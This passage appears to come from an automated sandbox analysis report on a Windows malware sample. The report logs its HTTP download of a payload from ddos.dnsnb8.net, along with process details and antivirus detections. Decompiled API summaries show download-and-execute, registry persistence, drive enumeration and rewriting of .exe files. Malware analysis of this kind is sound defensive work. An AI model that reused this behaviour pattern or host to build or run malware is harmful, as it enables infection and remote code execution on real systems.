                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                Host: ddos.dnsnb8.net:799
                                Connection: Keep-Alive


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            1 | 192.168.2.6 | 49715 | 44.221.84.105 | 799 | 5352 | C:\Users\user\AppData\Local\Temp\jawuwAtX.exe
                            Timestamp | Bytes transferred | Direction | Data
                            Jul 25, 2024 04:58:17.038465023 CEST | 288 | OUT | GET /cj//k2.rar HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate
                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                Host: ddos.dnsnb8.net:799
                                Connection: Keep-Alive



                            Target ID: 0
                            Start time: 22:58:11
                            Start date: 24/07/2024
                            Path: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe
                            Wow64 process (32bit): true
                            Commandline: "C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe"
                            Imagebase: 0xe0000
                            File size: 4'900'864 bytes
                            MD5 hash: 0140E8AAB1D9274870495213CDF82291
                            Has elevated privileges: true
                            Has administrator privileges: true
                            Programmed in: C, C++ or other language
                            Reputation: low
                            Has exited: true

                            Target ID: 2
                            Start time: 22:58:11
                            Start date: 24/07/2024
                            Path: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe
                            Wow64 process (32bit): true
                            Commandline: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe
                            Imagebase: 0x320000
                            File size: 15'872 bytes
                            MD5 hash: F7D21DE5C4E81341ECCD280C11DDCC9A
                            Has elevated privileges: true
                            Has administrator privileges: true
                            Programmed in: C, C++ or other language
                            Antivirus matches:
                            • Detection: 100%, Avira
                            • Detection: 100%, Joe Sandbox ML
                            • Detection: 92%, ReversingLabs
                            Reputation: moderate
                            Has exited: true

                            Target ID: 6
                            Start time: 22:58:16
                            Start date: 24/07/2024
                            Path: C:\Windows\SysWOW64\WerFault.exe
                            Wow64 process (32bit): true
                            Commandline: C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 1548
                            Imagebase: 0x750000
                            File size: 483'680 bytes
                            MD5 hash: C31336C1EFC2CCB44B4326EA793040F2
                            Has elevated privileges: true
                            Has administrator privileges: true
                            Programmed in: C, C++ or other language
                            Reputation: high
                            Has exited: true


                              Execution Graph

                              Execution Coverage:28.8%
                              Dynamic/Decrypted Code Coverage:10.4%
                              Signature Coverage:23.6%
                              Total number of Nodes:297
                              Total number of Limit Nodes:10

                              Callgraph


                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.2235766696.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000002.00000002.2235745040.0000000000320000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000002.00000002.2235788537.0000000000323000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000002.00000002.2235813937.0000000000324000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000002.00000002.2235835027.0000000000326000.00000040.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_320000_jawuwAtX.jbxd
                              Similarity
                              • API ID: memset$Find$Filelstrcmpilstrlen$CloseFirstNextlstrcpynstrrchrwsprintf
                              • String ID: %s*$C:\$Documents and Settings
                              • API String ID: 2826467728-110786608
                              • Opcode ID: 6dd721a27e4cc9c15232c1cc38d42c1486f4b01f00f10aa7bdaa34d0f0ce9c4b
                              • Instruction ID: 73c476861451471652f25b9a6a6c28759bdd2e80e21ff83c2755f439ee3ec1d5
                              • Opcode Fuzzy Hash: 6dd721a27e4cc9c15232c1cc38d42c1486f4b01f00f10aa7bdaa34d0f0ce9c4b
                              • Instruction Fuzzy Hash: 8C4172B2804359BFD732DBA0EC89DEB77ACEB84315F04482AF945D7111E634D6498BA2

                              Control-flow Graph

                              APIs
                                • Part of subcall function 0032185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,76938400,http://%s:%d/%s/%s,?,?,?,00321118), ref: 00321867
                                • Part of subcall function 0032185B: srand.MSVCRT ref: 00321878
                                • Part of subcall function 0032185B: rand.MSVCRT ref: 00321880
                                • Part of subcall function 0032185B: srand.MSVCRT ref: 00321890
                                • Part of subcall function 0032185B: rand.MSVCRT ref: 00321894
                              • WinExec.KERNEL32(?,00000005), ref: 003210F1
                              • lstrlen.KERNEL32(00324748), ref: 003210FA
                              • wsprintfA.USER32 ref: 0032112A
                              • wsprintfA.USER32 ref: 00321143
                              • URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 0032115B
                              • lstrlen.KERNEL32(ddos.dnsnb8.net,00000000,?,?,00000000,00000000), ref: 00321169
                              • Sleep.KERNEL32 ref: 00321179
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.2235766696.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000002.00000002.2235745040.0000000000320000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000002.00000002.2235788537.0000000000323000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000002.00000002.2235813937.0000000000324000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000002.00000002.2235835027.0000000000326000.00000040.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_320000_jawuwAtX.jbxd
                              Similarity
                              • API ID: FileTimelstrlenrandsrandwsprintf$DownloadExecSleepSystem
                              • String ID: %s%.8X.exe$C:\Users\user\AppData\Local\Temp\$HG2$cj/$ddos.dnsnb8.net$http://%s:%d/%s/%s
                              • API String ID: 1280626985-2007074917
                              • Opcode ID: deb89e8ff0711899d18795bb70803e1c91258e02ca66c7f18457b091c05875d0
                              • Instruction ID: a45dc6f875ee1b733f0a03efb108be6045a9a3b88e0a88ab8a2203dcd4d6ff80
                              • Opcode Fuzzy Hash: deb89e8ff0711899d18795bb70803e1c91258e02ca66c7f18457b091c05875d0
                              • Instruction Fuzzy Hash: 02216275900268BEDB23DBA0FD45FAFBBBCEB15315F114059E601A2050D774AB95CF60

                              Control-flow Graph

                              APIs
                              • GetSystemTimeAsFileTime.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\jawuwAtX.exe), ref: 00321729
                              • SHSetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,00000003,?,00000008), ref: 0032174C
                              • SHGetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,?,?,00000001), ref: 0032177C
                              • __aulldiv.LIBCMT ref: 00321796
                              • __aulldiv.LIBCMT ref: 003217A8
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.2235766696.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000002.00000002.2235745040.0000000000320000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000002.00000002.2235788537.0000000000323000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000002.00000002.2235813937.0000000000324000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000002.00000002.2235835027.0000000000326000.00000040.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_320000_jawuwAtX.jbxd
                              Similarity
                              • API ID: TimeValue__aulldiv$FileSystem
                              • String ID: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe$SOFTWARE\GTplus$Time
                              • API String ID: 541852442-1543586066
                              • Opcode ID: e11adb3491f0f95f0a3df5d4bdc9a4815edf1bd503c58ea2545f5e8646995b3c
                              • Instruction ID: 5b2a2f493e2909f8aeaa6e6f84e872341133bc66442b0041b51f7c2ea55da70a
                              • Opcode Fuzzy Hash: e11adb3491f0f95f0a3df5d4bdc9a4815edf1bd503c58ea2545f5e8646995b3c
                              • Instruction Fuzzy Hash: E811C871A00329BBDB229B94ED85FEF7BBCEB50B10F108015F900B6140D6749A44CBA0

                              Control-flow Graph

                              APIs
                              • VirtualAlloc.KERNEL32(00000000,00001800,00001000,00000004), ref: 003260BE
                              • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 003260DF
                              • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00326189
                              • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 003261A5
                              Memory Dump Source
                              • Source File: 00000002.00000002.2235835027.0000000000326000.00000040.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000002.00000002.2235745040.0000000000320000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000002.00000002.2235766696.0000000000321000.00000020.00000001.01000000.00000004.sdmp
                              • Associated: 00000002.00000002.2235788537.0000000000323000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000002.00000002.2235813937.0000000000324000.00000004.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_320000_jawuwAtX.jbxd
                              Similarity
                              • API ID: Virtual$AllocFree
                              • String ID:
                              • API String ID: 2087232378-0
                              • Opcode ID: 0f9f2f4144387320fcb5365edba17eadbf21a8b0d83f013edec13361520e8a96
                              • Instruction ID: c8c7dc427838243386c2da6acfb548648d874becfcfc744e0117d81466a86bd5
                              • Opcode Fuzzy Hash: 0f9f2f4144387320fcb5365edba17eadbf21a8b0d83f013edec13361520e8a96
                              • Instruction Fuzzy Hash: 371244B25087A48FDB338F24DC56BEA3BB4EF02310F1945AED9858B693D774A910C750

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 364 322b8c-322bc6 memset GetLogicalDriveStringsA 365 322bc8-322bcc 364->365 366 322c09-322c28 WaitForMultipleObjects 364->366 367 322bfa-322c07 lstrlen 365->367 368 322bce-322bd0 365->368 369 322c2a-322c3a CreateThread 366->369 370 322c3c-322c45 366->370 367->365 367->366 368->367 371 322bd2-322bdc GetDriveTypeA 368->371 369->370 371->367 372 322bde-322be1 371->372 372->367 373 322be3-322bf6 CreateThread 372->373 373->367
                              APIs
                              • memset.MSVCRT ref: 00322BA6
                              • GetLogicalDriveStringsA.KERNEL32(00000050,?), ref: 00322BB4
                              • GetDriveTypeA.KERNEL32(?), ref: 00322BD3
                              • CreateThread.KERNEL32(00000000,00000000,00322B7D,?,00000000,00000000), ref: 00322BEE
                              • lstrlen.KERNEL32(?), ref: 00322BFB
                              • WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 00322C16
                              • CreateThread.KERNEL32(00000000,00000000,00322845,00000000,00000000,00000000), ref: 00322C3A
                              Memory Dump Source
                              • Source File: 00000002.00000002.2235766696.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000002.00000002.2235745040.0000000000320000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000002.00000002.2235788537.0000000000323000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000002.00000002.2235813937.0000000000324000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000002.00000002.2235835027.0000000000326000.00000040.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_320000_jawuwAtX.jbxd
                              Similarity
                              • API ID: CreateDriveThread$LogicalMultipleObjectsStringsTypeWaitlstrlenmemset
                              • String ID:
                              • API String ID: 1073171358-0
                              • Opcode ID: 30abcd0861a099e9bb9242db35d76aebc977873f9928a4c8ecfe9670fbf35adc
                              • Instruction ID: 212f855cd2c7d49d771795fcc826ed24faf2bbebad1ed048408ef709d5f1fae6
                              • Opcode Fuzzy Hash: 30abcd0861a099e9bb9242db35d76aebc977873f9928a4c8ecfe9670fbf35adc
                              • Instruction Fuzzy Hash: BE2190B180016CBFEB329F64BC84DAF7BADFB05354F160129F95292161D7288E06CB71

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 0 321e6e-321e95 call 322d60 3 321e97 call 321d8a 0->3 4 321e9c-321eaa call 321df6 0->4 3->4 8 322332 4->8 9 321eb0-321ed9 SetFileAttributesA CreateFileA 4->9 11 322338-32233b 8->11 9->8 10 321edf-321f28 call 321915 SetFilePointer CreateFileMappingA MapViewOfFile 9->10 10->8 20 321f2e-321f39 10->20 13 322346-322349 11->13 14 32233d-322340 UnmapViewOfFile 11->14 16 322350-322354 13->16 17 32234b-32234e FindCloseChangeNotification 13->17 14->13 18 322391-32239a call 322d9b 16->18 19 322356-32235b FindCloseChangeNotification 16->19 17->16 19->18 20->8 22 321f3f-321f56 20->22 22->8 24 321f5c-321f64 22->24 24->8 25 321f6a-321f70 24->25 25->8 26 321f76-321f87 call 321c81 25->26 26->8 29 321f8d-321fa7 call 32185b call 321c81 26->29 29->8 34 321fad-321fb4 29->34 35 321fb6-321fc5 call 321af9 34->35 36 322024-322045 34->36 35->36 44 321fc7-321fd2 35->44 36->8 37 32204b-32204e 36->37 39 322070-3220f4 call 321af9 * 2 call 321c68 * 2 memset * 2 37->39 40 322050-322053 37->40 62 3220f5-3220fe 39->62 42 322056-32205a 40->42 42->39 45 32205c-322061 42->45 44->8 47 321fd8-321fe7 44->47 45->8 48 322067-32206e 45->48 50 321fe9-321fec 47->50 51 321fef-322006 call 321af9 47->51 48->42 50->51 57 322013-32201e FlushViewOfFile 51->57 58 322008-32200e call 321c68 51->58 57->36 58->57 63 322130-322139 62->63 64 322100-322114 62->64 67 32213c-322142 63->67 65 322116-32212a 64->65 66 32212d-32212e 64->66 65->66 66->62 68 322144-322150 67->68 69 32215c 67->69 70 322152-322154 68->70 71 322157-32215a 68->71 72 32215f-322162 69->72 70->71 71->67 73 322181-322184 72->73 74 322164-322171 72->74 75 322186 73->75 76 32218d-3221ba call 321c68 73->76 77 322177-32217e 74->77 78 32232a-32232d 74->78 75->76 81 3221d3-32220b call 321c81 call 321c68 76->81 82 3221bc-3221d0 call 321c68 76->82 77->73 78->72 89 32221b-32221e 81->89 90 32220d-322218 call 321c68 81->90 82->81 91 322220-322223 89->91 92 322226-32231a memcpy UnmapViewOfFile CloseHandle call 321b8a call 32185b SetFilePointer SetEndOfFile SetFilePointer WriteFile * 2 call 321915 89->92 90->89 91->92 100 32231f-322328 CloseHandle 92->100 100->11
                              APIs
                              • SetFileAttributesA.KERNEL32(?,00000080,?,003232B0,00000164,00322986,?), ref: 00321EB9
                              • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00321ECD
                              • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002,00000000,00000000), ref: 00321EF3
                              • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000000,00000000), ref: 00321F07
                              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000400), ref: 00321F1D
                              • FlushViewOfFile.KERNEL32(?,00000400,?,00000000,00000000,?,00000000,00000002), ref: 0032201E
                              • memset.MSVCRT ref: 003220D8
                              • memset.MSVCRT ref: 003220EA
                              • memcpy.MSVCRT ref: 0032222D
                              • UnmapViewOfFile.KERNEL32(?,?,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00322238
                              • CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 0032224A
                              • SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 003222C6
                              • SetEndOfFile.KERNEL32(000000FF,?,?,?,00000000,00000000,?,00000000,00000002), ref: 003222CB
                              • SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,00000000,00000000,?,00000000,00000002), ref: 003222DD
                              • WriteFile.KERNEL32(000000FF,00324008,00000271,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 003222F7
                              • WriteFile.KERNEL32(000000FF,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 0032230D
                              • CloseHandle.KERNEL32(000000FF,000000FF,00000001,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00322322
                              • UnmapViewOfFile.KERNEL32(?,?,003232B0,00000164,00322986,?), ref: 00322340
                              • FindCloseChangeNotification.KERNEL32(?,?,003232B0,00000164,00322986,?), ref: 0032234E
                              • FindCloseChangeNotification.KERNEL32(000000FF,?,003232B0,00000164,00322986,?), ref: 00322359
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.2235766696.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000002.00000002.2235745040.0000000000320000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000002.00000002.2235788537.0000000000323000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000002.00000002.2235813937.0000000000324000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000002.00000002.2235835027.0000000000326000.00000040.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_320000_jawuwAtX.jbxd
                              Similarity
                              • API ID: File$CloseView$Pointer$ChangeCreateFindHandleNotificationUnmapWritememset$AttributesFlushMappingmemcpy
                              • String ID: .@2$5@2$<@2$C@2$m@2
                              • API String ID: 3349749541-162344717
                              • Opcode ID: 85d693554f1dfbf7a8d412237954cfcfbaa8896cd4b320780866c18711159a3d
                              • Instruction ID: afb51e8e0a75125b4ba0e1898cc373da820a4b2da59586a3e8ea368c3e76dded
                              • Opcode Fuzzy Hash: 85d693554f1dfbf7a8d412237954cfcfbaa8896cd4b320780866c18711159a3d
                              • Instruction Fuzzy Hash: 05F18175900228EFCB22DFA4ED80AAEBBB5FF08314F10852DE519AB661D734AD51CF50

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 117 321973-32199a PathFileExistsA 118 3219a0-3219aa 117->118 119 321ac7-321acc 117->119 120 3219af-3219c2 CreateFileA 118->120 121 321ad0-321ad5 119->121 122 321ace 119->122 123 3219c4-3219d3 Sleep 120->123 124 321a28-321a36 GetFileSize 120->124 125 321af0-321af6 121->125 126 321ad7-321ad9 121->126 122->121 123->120 127 3219d5-321a0b call 32185b wsprintfA CopyFileA 123->127 128 321a87-321a8b 124->128 129 321a38-321a3b 124->129 126->125 127->124 141 321a0d-321a26 CreateFileA 127->141 130 321a96-321a9a 128->130 131 321a8d-321a90 FindCloseChangeNotification 128->131 129->128 133 321a3d-321a51 VirtualAlloc 129->133 134 321a9c 130->134 135 321aad-321ab1 130->135 131->130 133->128 137 321a53-321a57 133->137 138 321aa0-321aa7 DeleteFileA 134->138 139 321ab3-321ab6 135->139 140 321adb-321ae0 135->140 142 321a80 137->142 143 321a59-321a6d ReadFile 137->143 138->135 139->119 144 321ab8-321ac1 VirtualFree 139->144 146 321ae2-321ae5 140->146 147 321ae7-321aec 140->147 141->124 145 321a9e 141->145 142->128 143->128 148 321a6f-321a7e 143->148 144->119 145->138 146->147 147->125 149 321aee 147->149 148->142 148->143 149->125
                              APIs
                              • PathFileExistsA.SHLWAPI(\N2`N2,00000000,C:\Users\user\AppData\Local\Temp\jawuwAtX.exe), ref: 00321992
                              • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 003219BA
                              • Sleep.KERNEL32(00000064), ref: 003219C6
                              • wsprintfA.USER32 ref: 003219EC
                              • CopyFileA.KERNEL32(?,?,00000000), ref: 00321A00
                              • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00321A1E
                              • GetFileSize.KERNEL32(?,00000000), ref: 00321A2C
                              • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00321A46
                              • ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 00321A65
                              • FindCloseChangeNotification.KERNEL32(000000FF), ref: 00321A90
                              • DeleteFileA.KERNEL32(?), ref: 00321AA7
                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00321AC1
                              Strings
                              • C:\Users\user\AppData\Local\Temp\, xrefs: 003219DB
                              • %s%.8X.data, xrefs: 003219E6
                              • \N2`N2, xrefs: 00321980
                              • C:\Users\user\AppData\Local\Temp\jawuwAtX.exe, xrefs: 0032197C
                              Memory Dump Source
                              • Source File: 00000002.00000002.2235766696.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000002.00000002.2235745040.0000000000320000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000002.00000002.2235788537.0000000000323000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000002.00000002.2235813937.0000000000324000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000002.00000002.2235835027.0000000000326000.00000040.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_320000_jawuwAtX.jbxd
                              Similarity
                              • API ID: File$CreateVirtual$AllocChangeCloseCopyDeleteExistsFindFreeNotificationPathReadSizeSleepwsprintf
                              • String ID: %s%.8X.data$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\jawuwAtX.exe$\N2`N2
                              • API String ID: 2523042076-3098686819
                              • Opcode ID: 8f35928885fe19f6c0d2bb4eebe8467a024f2d858035e1cece35d5bd20ac5c9d
                              • Instruction ID: 4e98f2bf33ae05fbb3e34bd65e7fcfdebe009594913d48714a320f5b3beba027
                              • Opcode Fuzzy Hash: 8f35928885fe19f6c0d2bb4eebe8467a024f2d858035e1cece35d5bd20ac5c9d
                              • Instruction Fuzzy Hash: 93518E71D01229EFCB229F98EE84AAEBBBCFB14354F114569F516E6190C3749E41CFA0

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 150 3228b8-3228ff memset wsprintfA 151 322905-32290d 150->151 152 3229db-3229df 150->152 151->152 153 322913-322919 151->153 154 322956-322965 strrchr 153->154 155 32291b-32294c memset wsprintfA call 3229e2 153->155 154->152 157 322967-322978 lstrcmpiA 154->157 158 322951 155->158 159 32297a-322981 call 321e6e 157->159 160 322988-322992 lstrcmpiA 157->160 158->152 165 322986 159->165 160->152 161 322994-32299b 160->161 163 3229ad-3229c9 strstr 161->163 164 32299d-3229a3 161->164 167 3229d3-3229d6 call 322692 163->167 168 3229cb-3229d1 call 32239d 163->168 164->163 166 3229a5-3229a7 lstrcpy 164->166 165->152 166->163 167->152 168->152
                              APIs
                              • memset.MSVCRT ref: 003228D3
                              • wsprintfA.USER32 ref: 003228F7
                              • memset.MSVCRT ref: 00322925
                              • wsprintfA.USER32 ref: 00322940
                                • Part of subcall function 003229E2: memset.MSVCRT ref: 00322A02
                                • Part of subcall function 003229E2: wsprintfA.USER32 ref: 00322A1A
                                • Part of subcall function 003229E2: memset.MSVCRT ref: 00322A44
                                • Part of subcall function 003229E2: lstrlen.KERNEL32(?), ref: 00322A54
                                • Part of subcall function 003229E2: lstrcpyn.KERNEL32(?,?,-00000001), ref: 00322A6C
                                • Part of subcall function 003229E2: strrchr.MSVCRT ref: 00322A7C
                                • Part of subcall function 003229E2: lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 00322A9F
                                • Part of subcall function 003229E2: lstrlen.KERNEL32(Documents and Settings), ref: 00322AAE
                                • Part of subcall function 003229E2: memset.MSVCRT ref: 00322AC6
                                • Part of subcall function 003229E2: memset.MSVCRT ref: 00322ADA
                                • Part of subcall function 003229E2: FindFirstFileA.KERNEL32(?,?), ref: 00322AEF
                                • Part of subcall function 003229E2: memset.MSVCRT ref: 00322B13
                              • strrchr.MSVCRT ref: 00322959
                              • lstrcmpiA.KERNEL32(00000001,exe), ref: 00322974
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.2235766696.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000002.00000002.2235745040.0000000000320000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000002.00000002.2235788537.0000000000323000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000002.00000002.2235813937.0000000000324000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000002.00000002.2235835027.0000000000326000.00000040.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_320000_jawuwAtX.jbxd
                              Similarity
                              • API ID: memset$wsprintf$lstrcmpilstrlenstrrchr$FileFindFirstlstrcpyn
                              • String ID: %s%s$%s\$C:\Users\user\AppData\Local\Temp\$exe$rar
                              • API String ID: 3004273771-1791786966
                              • Opcode ID: 4591b88964a60d327e52e39f7677b223e0f715ef112fd91f3f0fac62279cfcf8
                              • Instruction ID: 940710ed7a446602fcbdd468a85a2d0d90ec01551849b417fa8cf689a65ceb02
                              • Opcode Fuzzy Hash: 4591b88964a60d327e52e39f7677b223e0f715ef112fd91f3f0fac62279cfcf8
                              • Instruction Fuzzy Hash: DA31D67294033CBBDB22AB64FC85FDB776C9F10310F050856F545A6080E7B8DAD58BA0

                              Control-flow Graph

                              APIs
                              • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\,?,00000005,00000000), ref: 0032164F
                              • GetSystemDirectoryA.KERNEL32(C:\Windows\system32,00000104), ref: 0032165B
                              • GetModuleFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\jawuwAtX.exe,00000104), ref: 0032166E
                              • CreateThread.KERNEL32(00000000,00000000,Function_00001099,00000000,00000000,00000000), ref: 003216AC
                              • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000), ref: 003216BD
                                • Part of subcall function 0032139F: GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\jawuwAtX.exe), ref: 003213BC
                                • Part of subcall function 0032139F: LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 003213DA
                                • Part of subcall function 0032139F: GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00321448
                              • lstrcpy.KERNEL32(?,C:\Users\user\AppData\Local\Temp\jawuwAtX.exe), ref: 003216E5
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.2235766696.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000002.00000002.2235745040.0000000000320000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000002.00000002.2235788537.0000000000323000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000002.00000002.2235813937.0000000000324000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000002.00000002.2235835027.0000000000326000.00000040.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_320000_jawuwAtX.jbxd
                              Similarity
                              • API ID: CreateCurrentDirectoryFileLookupModuleNameObjectPathPrivilegeProcessSingleSystemTempThreadValueVersionWaitlstrcpy
                              • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\jawuwAtX.exe$C:\Windows\system32$Documents and Settings
                              • API String ID: 123563730-2830869553
                              • Opcode ID: 3608838e3643b768e01abcd513e8ca317306df2c0f5d915537f1ba4176ad47ff
                              • Instruction ID: ae66f96ffaa590d015c756da038178dd99aead411041cdfd167ba32ede0870a4
                              • Opcode Fuzzy Hash: 3608838e3643b768e01abcd513e8ca317306df2c0f5d915537f1ba4176ad47ff
                              • Instruction Fuzzy Hash: 3F11B672501234BBCB336BA5BE4DEDB3E6DEB65761F004019F60A950A0C6758942CBB1

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 205 321000-321023 CreateFileA 206 321092-321096 205->206 207 321025-321055 GetFileSize CreateFileMappingA MapViewOfFile 205->207 208 321057-32105f 207->208 209 32107b-321085 207->209 210 321061-32106e call 3217d0 208->210 211 321074-321075 UnmapViewOfFile 208->211 212 321087-32108b CloseHandle 209->212 213 32108d-321091 CloseHandle 209->213 210->211 211->209 212->213 213->206
                              APIs
                              • CreateFileA.KERNEL32(00000003,C0000000,00000003,00000000,00000003,00000080,00000000,HG2,http://%s:%d/%s/%s,003210E8,?), ref: 00321018
                              • GetFileSize.KERNEL32(00000000,00000000,ddos.dnsnb8.net,76938400), ref: 00321029
                              • CreateFileMappingA.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 00321038
                              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 0032104B
                              • UnmapViewOfFile.KERNEL32(00000000), ref: 00321075
                              • CloseHandle.KERNEL32(?), ref: 0032108B
                              • CloseHandle.KERNEL32(00000000), ref: 0032108E
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.2235766696.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000002.00000002.2235745040.0000000000320000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000002.00000002.2235788537.0000000000323000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000002.00000002.2235813937.0000000000324000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000002.00000002.2235835027.0000000000326000.00000040.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_320000_jawuwAtX.jbxd
                              Similarity
                              • API ID: File$CloseCreateHandleView$MappingSizeUnmap
                              • String ID: HG2$ddos.dnsnb8.net$http://%s:%d/%s/%s
                              • API String ID: 1223616889-1867649725
